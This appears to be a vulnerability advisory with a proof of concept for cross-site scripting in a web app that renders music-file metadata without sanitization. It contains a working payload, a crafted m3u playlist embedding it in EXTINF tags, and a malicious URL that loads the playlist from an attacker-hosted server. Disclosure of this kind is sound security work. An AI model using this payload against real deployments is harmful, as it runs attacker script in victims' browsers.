An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files.
Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:
<img src=x onerror=alert(document.domain)>The CVE score and PoC is based on the m3u approach, which results in a higher severity.
Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.
#EXTM3U
#EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>
http://example.com/audio.mp3
Craft and share the malicious URL:
http://127.0.0.1:3923/#m3u=https://example.com/song.m3u
Any user that accesses this malicious URL is impacted.